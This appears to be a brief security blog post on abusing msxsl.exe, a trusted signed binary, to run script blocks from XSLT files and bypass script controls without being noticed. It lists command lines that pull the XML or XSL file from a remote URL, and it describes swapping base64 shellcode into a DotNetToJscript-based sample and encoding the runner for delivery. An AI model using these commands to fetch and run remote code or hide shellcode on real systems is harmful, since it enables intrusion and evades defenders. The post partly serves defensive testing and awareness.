XSLT Script Block Sample
The basic gist, and what I think is interesting is that you can host/execute scripts inside trusted signed binaries that ingest XML.
So, here is an example, a tool called msxsl.exe.
You can download it here:
1. start /b msxsl.exe customers.xml report.xsl 2. start /b msxsl.exe http://example.com/customers.xml report.xsl 3. start /b msxsl.exe customers.xml http://example.com/report.xsl
The sample code above just show a very basic example. If you look at the parameters accepted, either the xml or xsl file can be a url.
So, msxsl.exe while not default, may exist in your fleet, and it packs a powerful punch. It is a trusted binary that can be used to bypass some script controls.
Here again, you have a tool, that is working as designed, yet gives has functionality that can easily circumvent many controls.
By that I mean, execution events are likely not being noticed.... And it allows you to load and execute vbs/js and more...
I recently updated a sample you can use for testing. So, I using the amazing DotNetToJscript, all you need is to update the base64 shell code here and you can execute in the context of msxsl.exe. Keep in mind its a 32 bit application.
MSXSL Test Cases
You could easily base64 encode and deliver this script host runner too. Its small but packs a big punch ;-)
Thats all. Short and simple.